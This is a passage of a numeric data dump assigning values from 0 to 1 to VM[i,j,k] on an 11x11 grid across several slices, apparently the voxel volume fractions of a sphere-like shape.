VM[8,7,1] = 0.62
VM[9,7,1] = 0.04
VM[10,7,1] = 0.00
VM[0,8,1] = 0.00
VM[1,8,1] = 0.00
VM[2,8,1] = 0.14
VM[3,8,1] = 0.62
VM[4,8,1] = 0.91
VM[5,8,1] = 0.96
VM[6,8,1] = 0.91
VM[7,8,1] = 0.62
VM[8,8,1] = 0.14
VM[9,8,1] = 0.00
VM[10,8,1] = 0.00
VM[0,9,1] = 0.00
VM[1,9,1] = 0.00
VM[2,9,1] = 0.00
VM[3,9,1] = 0.04
VM[4,9,1] = 0.19
VM[5,9,1] = 0.24
VM[6,9,1] = 0.19
VM[7,9,1] = 0.04
VM[8,9,1] = 0.00
VM[9,9,1] = 0.00
VM[10,9,1] = 0.00
VM[0,10,1] = 0.00
VM[1,10,1] = 0.00
VM[2,10,1] = 0.00
VM[3,10,1] = 0.00
VM[4,10,1] = 0.00
VM[5,10,1] = 0.00
VM[6,10,1] = 0.00
VM[7,10,1] = 0.00
VM[8,10,1] = 0.00
VM[9,10,1] = 0.00
VM[10,10,1] = 0.00
VM[0,0,2] = 0.00
VM[1,0,2] = 0.00
VM[2,0,2] = 0.00
VM[3,0,2] = 0.00
VM[4,0,2] = 0.07
VM[5,0,2] = 0.14
VM[6,0,2] = 0.07
VM[7,0,2] = 0.00
VM[8,0,2] = 0.00
VM[9,0,2] = 0.00
VM[10,0,2] = 0.00
VM[0,1,2] = 0.00
VM[1,1,2] = 0.00
VM[2,1,2] = 0.14
VM[3,1,2] = 0.62
VM[4,1,2] = 0.91
VM[5,1,2] = 0.96
VM[6,1,2] = 0.91
VM[7,1,2] = 0.62
VM[8,1,2] = 0.14
VM[9,1,2] = 0.00
VM[10,1,2] = 0.00
VM[0,2,2] = 0.00
VM[1,2,2] = 0.14
VM[2,2,2] = 0.84
VM[3,2,2] = 1.00
VM[4,2,2] = 1.00
VM[5,2,2] = 1.00
VM[6,2,2] = 1.00
VM[7,2,2] = 1.00
VM[8,2,2] = 0.84
VM[9,2,2] = 0.14
VM[10,2,2] = 0.00
VM[0,3,2] = 0.00
VM[1,3,2] = 0.62
VM[2,3,2] = 1.00
VM[3,3,2] = 1.00
VM[4,3,2] = 1.00
VM[5,3,2] = 1.00
VM[6,3,2] = 1.00
VM[7,3,2] = 1.00
VM[8,3,2] = 1.00
VM[9,3,2] = 0.62
VM[10,3,2] = 0.00
VM[0,4,2] = 0.07
VM[1,4,2] = 0.91
VM[2,4,2] = 1.00
VM[3,4,2] = 1.00
VM[4,4,2] = 1.00
VM[5,4,2] = 1.00
VM[6,4,2] = 1.00
VM[7,4,2] = 1.00
VM[8,4,2] = 1.00
VM[9,4,2] = 0.91
VM[10,4,2] = 0.07
VM[0,5,2] = 0.14
VM[1,5,2] = 0.96
VM[2,5,2] = 1.00
VM[3,5,2] = 1.00
VM[4,5,2] = 1.00
VM[5,5,2] = 1.00
VM[6,5,2] = 1.00
VM[7,5,2] = 1.00
VM[8,5,2] = 1.00
VM[9,5,2] = 0.96
VM[10,5,2] = 0.14
VM[0,6,2] = 0.07
VM[1,6,2] = 0.91
VM[2,6,2] = 1.00
VM[3,6,2] = 1.00
VM[4,6,2] = 1.00
VM[5,6,2] = 1.00
VM[6,6,2] = 1.00
VM[7,6,2] = 1.00
VM[8,6,2] = 1.00
VM[9,6,2] = 0.91
VM[10,6,2] = 0.07
VM[0,7,2] = 0.00
VM[1,7,2] = 0.62
VM[2,7,2] = 1.00
VM[3,7,2] = 1.00
VM[4,7,2] = 1.00
VM[5,7,2] = 1.00
VM[6,7,2] = 1.00
VM[7,7,2] = 1.00
VM[8,7,2] = 1.00
VM[9,7,2] = 0.62
VM[10,7,2] = 0.00
VM[0,8,2] = 0.00
VM[1,8,2] = 0.14
VM[2,8,2] = 0.84
VM[3,8,2] = 1.00
VM[4,8,2] = 1.00
VM[5,8,2] = 1.00
VM[6,8,2] = 1.00
VM[7,8,2] = 1.00
VM[8,8,2] = 0.84
VM[9,8,2] = 0.14
VM[10,8,2] = 0.00
VM[0,9,2] = 0.00
VM[1,9,2] = 0.00
VM[2,9,2] = 0.14
VM[3,9,2] = 0.62
VM[4,9,2] = 0.91
VM[5,9,2] = 0.96
VM[6,9,2] = 0.91
VM[7,9,2] = 0.62
VM[8,9,2] = 0.14
VM[9,9,2] = 0.00
VM[10,9,2] = 0.00
VM[0,10,2] = 0.00
VM[1,10,2] = 0.00
VM[2,10,2] = 0.00
VM[3,10,2] = 0.00
VM[4,10,2] = 0.07
VM[5,10,2] = 0.14
VM[6,10,2] = 0.07
VM[7,10,2] = 0.00
VM[8,10,2] = 0.00
VM[9,10,2] = 0.00
VM[10,10,2] = 0.00
VM[0,0,3] = 0.00
VM[1,0,3] = 0.00
VM[2,0,3] = 0.00
VM[3,0,3] = 0.21
VM[4,0,3] = 0.52
VM[5,0,3] = 0.60
VM[6,0,3] = 0.52
VM[7,0,3] = 0.21
VM[8,0,3] = 0.00
VM[9,0,3] = 0.00
VM[10,0,3] = 0.00
VM[0,1,3] = 0.00
VM[1,1,3] = 0.04
VM[2,1,3] = 0.62
VM[3,1,3] = 0.99
VM[4,1,3] = 1.00
VM[5,1,3] = 1.00
VM[6,1,3] = 1.00
VM[7,1,3] = 0.99
VM[8,1,3] = 0.62
VM[9,1,3] = 0.04
VM[10,1,3] = 0.00
VM[0,2,3] = 0.00
VM[1,2,3] = 0.62
VM[2,2,3] = 1.00
VM[3,2,3] = 1.00
VM[4,2,3] = 1.00
VM[5,2,3] = 1.00
VM[6,2,3] = 1.00
VM[7,2,3] = 1.00
VM[8,2,3] = 1.00
VM[9,2,3] = 0.62
VM[10,2,3] = 0.00
VM[0,3,3] = 0.21
VM[1,3,3] = 0.99
VM[2,3,3] = 1.00
VM[3,3,3] = 1.00
VM[4,3,3] = 1.00
VM[5,3,3] = 1.00
VM[6,3,3] = 1.00
VM[7,3,3] = 1.00
VM[8,3,3] = 1.00
VM[9,3,3] = 0.99
VM[10,3,3] = 0.21
VM[0,4,3] = 0.52
VM[1,4,3] = 1.00
VM[2,4,3] = 1.00
VM[3,4,3] = 1.00
VM[4,4,3] = 1.00
VM[5,4,3] = 1.00
VM[6,4,3] = 1.00
VM[7,4,3] = 1.00
VM[8,4,3] = 1.00
VM[9,4,3] = 1.00
VM[10,4,3] = 0.52
VM[0,5,3] = 0.60
VM[1,5,3] = 1.00
VM[2,5,3] = 1.00
VM[3,5,3] = 1.00
VM[4,5,3] = 1.00
VM[5,5,3] = 1.00
VM[6,5,3] = 1.00
VM[7,5,3] = 1.00
VM[8,5,3] = 1.00
VM[9,5,3] = 1.00
VM[10,5,3] = 0.60
VM[0,6,3] = 0.52
VM[1,6,3] = 1.00
VM[2,6,3] = 1.00
VM[3,6,3] = 1.00
VM[4,6,3] = 1.00
VM[5,6,3] = 1.00
VM[6,6,3] = 1.00
VM[7,6,3] = 1.00
VM[8,6,3] = 1.00
VM[9,6,3] = 1.00
VM[10,6,3] = 0.52
VM[0,7,3] = 0.21
VM[1,7,3] = 0.99
VM[2,7,3] = 1.00
VM[3,7,3] = 1.00
VM[4,7,3] = 1.00
VM[5,7,3] = 1.00
VM[6,7,3] = 1.00
VM[7,7,3] = 1.00
VM[8,7,3] = 1.00
VM[9,7,3] = 0.99
VM[10,7,3] = 0.21
VM[0,8,3] = 0.00
VM[1,8,3] = 0.62
VM[2,8,3] = 1.00
VM[3,8,3] = 1.00
VM[4,8,3] = 1.00
VM[5,8,3] = 1.00
VM[6,8,3] = 1.00
VM[7,8,3] = 1.00
VM[8,8,3] = 1.00
VM[9,8,3] = 0.62
VM[10,8,3] = 0.00
VM[0,9,3] = 0.00
VM[1,9,3] = 0.04
VM[2,9,3] = 0.62
VM[3,9,3] = 0.99
VM[4,9,3] = 1.00
VM[5,9,3] = 1.00
VM[6,9,3] = 1.00
VM[7,9,3] = 0.99
VM[8,9,3] = 0.62
VM[9,9,3] = 0.04
VM[10,9,3] = 0.00
VM[0,10,3] = 0.00
VM[1,10,3] = 0.00
VM[2,10,3] = 0.00
VM[3,10,3] = 0.21
VM[4,10,3] = 0.52
VM[5,10,3] = 0.60
VM[6,10,3] = 0.52
VM[7,10,3] = 0.21
VM[8,10,3] = 0.00
VM[9,10,3] = 0.00
VM[10,10,3] = 0.00
VM[0,0,4] = 0.00
VM[1,0,4] = 0.00
VM[2,0,4] = 0.07
VM[3,0,4] = 0.52
VM[4,0,4] = 0.80
VM[5,0,4] = 0.90
VM[6,0,4] = 0.80
VM[7,0,4] = 0.52
VM[8,0,4] = 0.07
VM[9,0,4] = 0.00
VM[10,0,4] = 0.00
VM[0,1,4] = 0.00
VM[1,1,4] = 0.19
VM[2,1,4] = 0.91
VM[3,1,4] = 1.00
VM[4,1,4] = 1.00
VM[5,1,4] = 1.00
VM[6,1,4] = 1.00
VM[7,1,4] = 1.00
VM[8,1,4] = 0.91
VM[9,1,4] = 0.19
VM[10,1,4] = 0.00
VM[0,2,4] = 0.07
VM[1,2,4] = 0.91
VM[2,2,4] = 1.00
VM[3,2,4] = 1.00
VM[4,2,4] = 1.00
VM[5,2,4] = 1.00
VM[6,2,4] = 1.00
VM[7,2,4] = 1.00
VM[8,2,4] = 1.00
VM[9,2,4] = 0.91
VM[10,2,4] = 0.07
VM[0,3,4] = 0.52
VM[1,3,4] = 1.00
VM[2,3,4] = 1.00
VM[3,3,4] = 1.00
VM[4,3,4] = 1.00
VM[5,3,4] = 1.00
VM[6,3,4] = 1.00
VM[7,3,4] = 1.00
VM[8,3,4] = 1.00
VM[9,3,4] = 1.00
VM[10,3,4] = 0.52
VM[0,4,4] = 0.80
VM[1,4,4] = 1.00
VM[2,4,4] = 1.00
VM[3,4,4] = 1.00
VM[4,4,4] = 1.00
VM[5,4,4] = 1.00
VM[6,4,4] = 1.00
VM[7,4,4] = 1.00
VM[8,4,4] = 1.00
VM[9,4,4] = 1.00
VM[10,4,4] = 0.80
VM[0,5,4] = 0.90
VM[1,5,4] = 1.00
VM[2,5,4] = 1.00
VM[3,5,4] = 1.00
VM[4,5,4] = 1.00
VM[5,5,4] = 1.00
VM[6,5,4] = 1.00
VM[7,5,4] = 1.00
VM[8,5,4] = 1.00
VM[9,5,4] = 1.00
VM[10,5,4] = 0.90
VM[0,6,4] = 0.80
VM[1,6,4] = 1.00
VM[2,6,4] = 1.00
VM[3,6,4] = 1.00
VM[4,6,4] = 1.00
VM[5,6,4] = 1.00
VM[6,6,4] = 1.00
VM[7,6,4] = 1.00
VM[8,6,4] = 1.00
VM[9,6,4] = 1.00
VM[10,6,4] = 0.80
VM[0,7,4] = 0.52
VM[1,7,4] = 1.00
VM[2,7,4] = 1.00
VM[3,7,4] = 1.00
VM[4,7,4] = 1.00
VM[5,7,4] = 1.00
VM[6,7,4] = 1.00
VM[7,7,4] = 1.00
VM[8,7,4] = 1.00
VM[9,7,4] = 1.00
VM[10,7,4] = 0.52
VM[0,8,4] = 0.07
VM[1,8,4] = 0.91
VM[2,8,4] = 1.00
VM[3,8,4] = 1.00
VM[4,8,4] = 1.00
VM[5,8,4] = 1.00
VM[6,8,4] = 1.00
VM[7,8,4] = 1.00
VM[8,8,4] = 1.00
VM[9,8,4] = 0.91
VM[10,8,4] = 0.07
VM[0,9,4] = 0.00
VM[1,9,4] = 0.19
VM[2,9,4] = 0.91
VM[3,9,4] = 1.00
VM[4,9,4] = 1.00
VM[5,9,4] = 1.00
VM[6,9,4] = 1.00
VM[7,9,4] = 1.00
VM[8,9,4] = 0.91
VM[9,9,4] = 0.19
VM[10,9,4] = 0.00
VM[0,10,4] = 0.00
VM[1,10,4] = 0.00
VM[2,10,4] = 0.07
VM[3,10,4] = 0.52
VM[4,10,4] = 0.80
VM[5,10,4] = 0.90
VM[6,10,4] = 0.80
VM[7,10,4] = 0.52
VM[8,10,4] = 0.07
VM[9,10,4] = 0.00
VM[10,10,4] = 0.00
VM[0,0,5] = 0.00
VM[1,0,5] = 0.00
VM[2,0,5] = 0.14
VM[3,0,5] = 0.60
VM[4,0,5] = 0.90
VM[5,0,5] = 1.00
VM[6,0,5] = 0.90
VM[7,0,5] = 0.60
VM[8,0,5] = 0.14
VM[9,0,5] = 0.00
VM[10,0,5] = 0.00
VM[0,1,5] = 0.00
VM[1,1,5] = 0.24
VM[2,1,5] = 0.96
VM[3,1,5] = 1.00
VM[4,1,5] = 1.00
VM[5,1,5] = 1.00
VM[6,1,5] = 1.00
VM[7,1,5] = 1.00
VM[8,1,5] = 0.96
VM[9,1,5] = 0.24
VM[10,1,5] = 0.00
VM[0,2,5] = 0.14
VM[1,2,5] = 0.96
VM[2,2,5] = 1.00
VM[3,2,5] = 1.00
VM[4,2,5] = 1.00
VM[5,2,5] = 1.00
VM[6,2,5] = 1.00
VM[7,2,5] = 1.00
VM[8,2,5] = 1.00
VM[9,2,5] = 0.96
VM[10,2,5] = 0.14
VM[0,3,5] = 0.60
VM[1,3,5] = 1.00
VM[2,3,5] = 1.00
VM[3,3,5] = 1.00
VM[4,3,5] = 1.00
VM[5,3,5] = 1.00
VM[6,3,5] = 1.00
VM[7,3,5] = 1.00
VM[8,3,5] = 1.00
VM[9,3,5] = 1.00
VM[10,3,5] = 0.60
VM[0,4,5] = 0.90
VM[1,4,5] = 1.00
VM[2,4,5] = 1.00
VM[3,4,5] = 1.00
VM[4,4,5] = 1.00
VM[5,4,5] = 1.00
VM[6,4,5] = 1.00
VM[7,4,5] = 1.00
VM[8,4,5] = 1.00
VM[9,4,5] = 1.00
VM[10,4,5] = 0.90
VM[0,5,5] = 1.00
VM[1,5,5] = 1.00
VM[2,5,5] = 1.00
VM[3,5,5] = 1.00
VM[4,5,5] = 1.00
VM[5,5,5] = 1.00
VM[6,5,5] = 1.00
VM[7,5,5] = 1.00
VM[8,5,5] = 1.00
VM[9,5,5] = 1.00
VM[10,5,5] = 1.00
VM[0,6,5] = 0.90
VM[1,6,5] = 1.00
VM[2,6,5] = 1.00
VM[3,6,5] = 1.00
VM[4,6,5] = 1.00
VM[5,6,5] = 1.00
VM[6,6,5] = 1.00
VM[7,6,5] = 1.00
VM[8,6,5] = 1.00
VM[9,6,5] = 1.00
VM[10,6,5] = 0.90
VM[0,7,5] = 0.60
VM[1,7,5] = 1.00
VM[2,7,5] = 1.00
VM[3,7,5] = 1.00
VM[4,7,5] = 1.00
VM[5,7,5] = 1.00
VM[6,7,5] = 1.00
VM[7,7,5] = 1.00
VM[8,7,5] = 1.00
VM[9,7,5] = 1.00
VM[10,7,5] = 0.60
VM[0,8,5] = 0.14
VM[1,8,5] = 0.96
VM[2,8,5] = 1.00
VM[3,8,5] = 1.00
VM[4,8,5] = 1.00
VM[5,8,5] = 1.00
VM[6,8,5] = 1.00
VM[7,8,5] = 1.00
VM[8,8,5] = 1.00
VM[9,8,5] = 0.96
VM[10,8,5] = 0.14
VM[0,9,5] = 0.00
VM[1,9,5] = 0.24
VM[2,9,5] = 0.96
VM[3,9,5] = 1.00
VM[4,9,5] = 1.00
VM[5,9,5] = 1.00
VM[6,9,5] = 1.00
VM[7,9,5] = 1.00
VM[8,9,5] = 0.96
VM[9,9,5] = 0.24
VM[10,9,5] = 0.00
VM[0,10,5] = 0.00
VM[1,10,5] = 0.00
VM[2,10,5] = 0.14
VM[3,10,5] = 0.60
VM[4,10,5] = 0.90
VM[5,10,5] = 1.00
VM[6,10,5] = 0.90
VM[7,10,5] = 0.60
VM[8,10,5] = 0.14
VM[9,10,5] = 0.00
VM[10,10,5] = 0.00
VM[0,0,6] = 0.00
VM[1,0,6] = 0.00
VM[2,0,6] = 0.07
VM[3,0,6] = 0.52
VM[4,0,6] = 0.80
VM[5,0,6] = 0.90
VM[6,0,6] = 0.80
VM[7,0,6] = 0.52
VM[8,0,6] = 0.07
VM[9,0,6] = 0.00
VM[10,0,6] = 0.00
VM[0,1,6] = 0.00
VM[1,1,6] = 0.19
VM[2,1,6] = 0.91
VM[3,1,6] = 1.00
VM[4,1,6] = 1.00
VM[5,1,6] = 1.00
VM[6,1,6] = 1.00
VM[7,1,6] = 1.00
VM[8,1,6] = 0.91
VM[9,1,6] = 0.19
VM[10,1,6] = 0.00
VM[0,2,6] = 0.07
VM[1,2,6] = 0.91
VM[2,2,6] = 1.00
VM[3,2,6] = 1.00
VM[4,2,6] = 1.00
VM[5,2,6] = 1.00
VM[6,2,6] = 1.00
VM[7,2,6] = 1.00
VM[8,2,6] = 1.00
VM[9,2,6] = 0.91
VM[10,2,6] = 0.07
VM[0,3,6] = 0.52
VM[1,3,6] = 1.00
VM[2,3,6] = 1.00
VM[3,3,6] = 1.00
VM[4,3,6] = 1.00
VM[5,3,6] = 1.00
VM[6,3,6] = 1.00
VM[7,3,6] = 1.00
VM[8,3,6] = 1.00
VM[9,3,6] = 1.00
VM[10,3,6] = 0.52
VM[0,4,6] = 0.80
VM[1,4,6] = 1.00
VM[2,4,6] = 1.00
VM[3,4,6] = 1.00
VM[4,4,6] = 1.00
VM[5,4,6] = 1.00
VM[6,4,6] = 1.00
VM[7,4,6] = 1.00
VM[8,4,6] = 1.00
VM[9,4,6] = 1.00
VM[10,4,6] = 0.80
VM[0,5,6] = 0.90
VM[1,5,6] = 1.00
VM[2,5,6] = 1.00
VM[3,5,6] = 1.00
VM[4,5,6] = 1.00
VM[5,5,6] = 1.00
VM[6,5,6] = 1.00
VM[7,5,6] = 1.00
VM[8,5,6] = 1.00
VM[9,5,6] = 1.00
VM[10,5,6] = 0.90
VM[0,6,6] = 0.80
VM[1,6,6] = 1.00
VM[2,6,6] = 1.00
VM[3,6,6] = 1.00
VM[4,6,6] = 1.00
VM[5,6,6] = 1.00
VM[6,6,6] = 1.00
VM[7,6,6] = 1.00
VM[8,6,6] = 1.00
VM[9,6,6] = 1.00
VM[10,6,6] = 0.80
VM[0,7,6] = 0.52
VM[1,7,6] = 1.00
VM[2,7,6] = 1.00
VM[3,7,6] = 1.00
VM[4,7,6] = 1.00
VM[5,7,6] = 1.00
VM[6,7,6] = 1.00
VM[7,7,6] = 1.00
VM[8,7,6] = 1.00
VM[9,7,6] = 1.00
VM[10,7,6] = 0.52
VM[0,8,6] = 0.07
VM[1,8,6] = 0.91
VM[2,8,6] = 1.00
VM[3,8,6] = 1.00
VM[4,8,6] = 1.00
VM[5,8,6] = 1.00
VM[6,8,6] = 1.00
VM[7,8,6] = 1.00
VM[8,8,6] = 1.00
VM[9,8,6] = 0.91
VM[10,8,6] = 0.07
VM[0,9,6] = 0.00
VM[1,9,6] = 0.19
VM[2,9,6] = 0.91
VM[3,9,6] = 1.00
VM[4,9,6] = 1.00
VM[5,9,6] = 1.00
VM[6,9,6] = 1.00
VM[7,9,6] = 1.00
VM[8,9,6] = 0.91
VM[9,9,6] = 0.19
VM[10,9,6] = 0.00
VM[0,10,6] = 0.00
VM[1,10,6] = 0.00
VM[2,10,6] = 0.07
VM[3,10,6] = 0.52
VM[4,10,6] = 0.80
VM[5,10,6] = 0.90
VM[6,10,6] = 0.80
VM[7,10,6] = 0.52
VM[8,10,6] = 0.07
VM[9,10,6] = 0.00
VM[10,10,6] = 0.00
VM[0,0,7] = 0.00
VM[1,0,7] = 0.00
VM[2,0,7] = 0.00
VM[3,0,7] = 0.21
VM[4,0,7] = 0.52
VM[5,0,7] = 0.60
VM[6,0,7] = 0.52
VM[7,0,7] = 0.21
VM[8,0,7] = 0.00
VM[9,0,7] = 0.00
VM[10,0,7] = 0.00
VM[0,1,7] = 0.00
VM[1,1,7] = 0.04
VM[2,1,7] = 0.62
VM[3,1,7] = 0.99
VM[4,1,7] = 1.00
VM[5,1,7] = 1.00
VM[6,1,7] = 1.00
VM[7,1,7] = 0.99
VM[8,1,7] = 0.62
VM[9,1,7] = 0.04
VM[10,1,7] = 0.00
VM[0,2,7] = 0.00
VM[1,2,7] = 0.62
VM[2,2,7] = 1.00
VM[3,2,7] = 1.00
VM[4,2,7] = 1.00
VM[5,2,7] = 1.00
VM[6,2,7] = 1.00
VM[7,2,7] = 1.00
VM[8,2,7] = 1.00
VM[9,2,7] = 0.62
VM[10,2,7] = 0.00
VM[0,3,7] = 0.21
VM[1,3,7] = 0.99
VM[2,3,7] = 1.00
VM[3,3,7] = 1.00
VM[4,3,7] = 1.00
VM[5,3,7] = 1.00
VM[6,3,7] = 1.00
VM[7,3,7] = 1.00
VM[8,3,7] = 1.00
VM[9,3,7] = 0.99
VM[10,3,7] = 0.21
VM[0,4,7] = 0.52
VM[1,4,7] = 1.00
VM[2,4,7] = 1.00
VM[3,4,7] = 1.00
VM[4,4,7] = 1.00
VM[5,4,7] = 1.00
VM[6,4,7] = 1.00
VM[7,4,7] = 1.00
VM[8,4,7] = 1.00
VM[9,4,7] = 1.00
VM[10,4,7] = 0.52
VM[0,5,7] = 0.60
VM[1,5,7] = 1.00
VM[2,5,7] = 1.00
VM[3,5,7] = 1.00
VM[4,5,7] = 1.00
VM[5,5,7] = 1.00
VM[6,5,7] = 1.00
VM[7,5,7] = 1.00
VM[8,5,7] = 1.00
VM[9,5,7] = 1.00
VM[10,5,7] = 0.60
VM[0,6,7] = 0.52
VM[1,6,7] = 1.00
VM[2,6,7] = 1.00
VM[3,6,7] = 1.00
VM[4,6,7] = 1.00
VM[5,6,7] = 1.00
VM[6,6,7] = 1.00
VM[7,6,7] = 1.00
VM[8,6,7] = 1.00
VM[9,6,7] = 1.00
VM[10,6,7] = 0.52
VM[0,7,7] = 0.21
VM[1,7,7] = 0.99
VM[2,7,7] = 1.00
VM[3,7,7] = 1.00
VM[4,7,7] = 1.00
VM[5,7,7] = 1.00
VM[6,7,7] = 1.00
VM[7,7,7] = 1.00
VM[8,7,7] = 1.00
VM[9,7,7] = 0.99
VM[10,7,7] = 0.21
VM[0,8,7] = 0.00
VM[1,8,7] = 0.62
VM[2,8,7] = 1.00
VM[3,8,7] = 1.00
VM[4,8,7] = 1.00
VM[5,8,7] = 1.00
VM[6,8,7] = 1.00
VM[7,8,7] = 1.00
VM[8,8,7] = 1.00
VM[9,8,7] = 0.62
VM[10,8,7] = 0.00
VM[0,9,7] = 0.00
VM[1,9,7] = 0.04
VM[2,9,7] = 0.62
VM[3,9,7] = 0.99
VM[4,9,7] = 1.00
VM[5,9,7] = 1.00
VM[6,9,7] = 1.00
VM[7,9,7] = 0.99
VM[8,9,7] = 0.62
VM[9,9,7] = 0.04
VM[10,9,7] = 0.00
VM[0,10,7] = 0.00
VM[1,10,7] = 0.00
VM[2,10,7] = 0.00
VM[3,10,7] = 0.21
VM[4,10,7] = 0.52
VM[5,10,7] = 0.60
VM[6,10,7] = 0.52
VM[7,10,7] = 0.21
VM[8,10,7] = 0.00
VM[9,10,7] = 0.00
VM[10,10,7] = 0.00
VM[0,0,8] = 0.00
VM[1,0,8] = 0.00
VM[2,0,8] = 0.00
VM[3,0,8] = 0.00
VM[4,0,8] = 0.07
VM[5,0,8] = 0.14
VM[6,0,8] = 0.07
VM[7,0,8] = 0.00
VM[8,0,8] = 0.00
VM[9,0,8] = 0.00
VM[10,0,8] = 0.00
VM[0,1,8] = 0.00
VM[1,1,8] = 0.00
VM[2,1,8] = 0.14
VM[3,1,8] = 0.62
VM[4,1,8] = 0.91
VM[5,1,8] = 0.96
VM[6,1,8] = 0.91
VM[7,1,8] = 0.62
VM[8,1,8] = 0.14
VM[9,1,8] = 0.00
VM[10,1,8] = 0.00
VM[0,2,8] = 0.00
VM[1,2,8] = 0.14
VM[2,2,8] = 0.84
VM[3,2,8] = 1.00
VM[4,2,8] = 1.00
VM[5,2,8] = 1.00
VM[6,2,8] = 1.00
VM[7,2,8] = 1.00
VM[8,2,8] = 0.84
VM[9,2,8] = 0.14
VM[10,2,8] = 0.00
VM[0,3,8] = 0.00
VM[1,3,8] = 0.62
VM[2,3,8] = 1.00
VM[3,3,8] = 1.00
VM[4,3,8] = 1.00
VM[5,3,8] = 1.00
VM[6,3,8] = 1.00
VM[7,3,8] = 1.00
VM[8,3,8] = 1.00
VM[9,3,8] = 0.62
VM[10,3,8] = 0.00
VM[0,4,8] = 0.07
VM[1,4,8] = 0.91
VM[2,4,8] = 1.00
VM[3,4,8] = 1.00
VM[4,4,8] = 1.00
VM[5,4,8] = 1.00
VM[6,4,8] = 1.00
VM[7,4,8] = 1.00
VM[8,4,8] = 1.00
VM[9,4,8] = 0.91
VM[10,4,8] = 0.07
VM[0,5,8] = 0.14
VM[1,5,8] = 0.96
VM[2,5,8] = 1.00
VM[3,5,8] = 1.00
VM[4,5,8] = 1.00
VM[5,5,8] = 1.00
VM[6,5,8] = 1.00
VM[7,5,8] = 1.00
VM[8,5,8] = 1.00
VM[9,5,8] = 0.96
VM[10,5,8] = 0.14
VM[0,6,8] = 0.07
VM[1,6,8] = 0.91
VM[2,6,8] = 1.00
VM[3,6,8] = 1.00
VM[4,6,8] = 1.00
VM[5,6,8] = 1.00
VM[6,6,8] = 1.00
VM[7,6,8] = 1.00
VM[8,6,8] = 1.00
VM[9,6,8] = 0.91
VM[10,6,8] = 0.07
VM[0,7,8] = 0.00
VM[1,7,8] = 0.62
VM[2,7,8] = 1.00
VM[3,7,8] = 1.00
VM[4,7,8] = 1.00
VM[5,7,8] = 1.00
VM[6,7,8] = 1.00
VM[7,7,8] = 1.00
VM[8,7,8] = 1.00
VM[9,7,8] = 0.62
VM[10,7,8] = 0.00
VM[0,8,8] = 0.00
VM[1,8,8] = 0.14
VM[2,8,8] = 0.84
VM[3,8,8] = 1.00
VM[4,8,8] = 1.00
VM[5,8,8] = 1.00
VM[6,8,8] = 1.00
VM[7,8,8] = 1.00
VM[8,8,8] = 0.84
VM[9,8,8] = 0.14
VM[10,8,8] = 0.00
VM[0,9,8] = 0.00
VM[1,9,8] = 0.00
VM[2,9,8] = 0.14
VM[3,9,8] = 0.62
VM[4,9,8] = 0.91
VM[5,9,8] = 0.96
VM[6,9,8] = 0.91
VM[7,9,8] = 0.62
VM[8,9,8] = 0.14
VM[9,9,8] = 0.00
VM[10,9,8] = 0.00
VM[0,10,8] = 0.00
VM[1,10,8] = 0.00
VM[2,10,8] = 0.00
VM[3,10,8] = 0.00
VM[4,10,8] = 0.07
VM[5,10,8] = 0.14
VM[6,10,8] = 0.07
VM[7,10,8] = 0.00
VM[8,10,8] = 0.00
VM[9,10,8] = 0.00
VM[10,10,8] = 0.00
VM[0,0,9] = 0.00
VM[1,0,9] = 0.00
VM[2,0,9] = 0.00
VM[3,0,9] = 0.00
VM[4,0,9] = 0.00
VM[5,0,9] = 0.00
VM[6,0,9] = 0.00
VM[7,0,9] = 0.00
VM[8,0,9] = 0.00
VM[9,0,9] = 0.00
VM[10,0,9] = 0.00
VM[0,1,9] = 0.00
VM[1,1,9] = 0.00
VM[2,1,9] = 0.00
VM[3,1,9] = 0.04
VM[4,1,9] = 0.19
VM[5,1,9] = 0.24
VM[6,1,9] = 0.19
VM[7,1,9] = 0.04
VM[8,1,9] = 0.00
VM[9,1,9] = 0.00
VM[10,1,9] = 0.00
VM[0,2,9] = 0.00
VM[1,2,9] = 0.00
VM[2,2,9] = 0.14
VM[3,2,9] = 0.62
VM[4,2,9] = 0.91
VM[5,2,9] = 0.96
VM[6,2,9] = 0.91
VM[7,2,9] = 0.62
VM[8,2,9] = 0.14
VM[9,2,9] = 0.00
VM[10,2,9] = 0.00
VM[0,3,9] = 0.00
VM[1,3,9] = 0.04
VM[2,3,9] = 0.62
VM[3,3,9] = 0.99
VM[4,3,9] = 1.00
VM[5,3,9] = 1.00
VM[6,3,9] = 1.00
VM[7,3,9] = 0.99
VM[8,3,9] = 0.62
VM[9,3,9] = 0.04
VM[10,3,9] = 0.00
VM[0,4,9] = 0.00
VM[1,4,9] = 0.19
VM[2,4,9] = 0.91
VM[3,4,9] = 1.00
VM[4,4,9] = 1.00
VM[5,4,9] = 1.00
VM[6,4,9] = 1.00
VM[7,4,9] = 1.00
VM[8,4,9] = 0.91
VM[9,4,9] = 0.19
VM[10,4,9] = 0.00
VM[0,5,9] = 0.00
VM[1,5,9] = 0.24
VM[2,5,9] = 0.96
VM[3,5,9] = 1.00
VM[4,5,9] = 1.00
VM[5,5,9] = 1.00
VM[6,5,9] = 1.00
VM[7,5,9] = 1.00
VM[8,5,9] = 0.96
VM[9,5,9] = 0.24
VM[10,5,9] = 0.00
VM[0,6,9] = 0.00
VM[1,6,9] = 0.19
VM[2,6,9] = 0.91
VM[3,6,9] = 1.00
VM[4,6,9] = 1.00
VM[5,6,9] = 1.00
VM[6,6,9] = 1.00
VM[7,6,9] = 1.00
VM[8,6,9] = 0.91
VM[9,6,9] = 0.19
VM[10,6,9] = 0.00
VM[0,7,9] = 0.00
VM[1,7,9] = 0.04
VM[2,7,9] = 0.62
VM[3,7,9] = 0.99
VM[4,7,9] = 1.00
VM[5,7,9] = 1.00
VM[6,7,9] = 1.00
VM[7,7,9] = 0.99
VM[8,7,9] = 0.62
VM[9,7,9] = 0.04
VM[10,7,9] = 0.00
VM[0,8,9] = 0.00
VM[1,8,9] = 0.00
VM[2,8,9] = 0.14
VM[3,8,9] = 0.62
VM[4,8,9] = 0.91
VM[5,8,9] = 0.96
VM[6,8,9] = 0.91
VM[7,8,9] = 0.62
VM[8,8,9] = 0.14
VM[9,8,9] = 0.00
VM[10,8,9] = 0.00
VM[0,9,9] = 0.00
VM[1,9,9] = 0.00
VM[2,9,9] = 0.00
VM[3,9,9] = 0.04
VM[4,9,9] = 0.19
VM[5,9,9] = 0.24
VM[6,9,9] = 0.19
VM[7,9,9] = 0.04
VM[8,9,9] = 0.00
VM[9,9,9] = 0.00
VM[10,9,9] = 0.00
VM[0,10,9] = 0.00
VM[1,10,9] = 0.00
VM[2,10,9] = 0.00
VM[3,10,9] = 0.00
VM[4,10,9] = 0.00
VM[5,10,9] = 0.00
VM[6,10,9] = 0.00
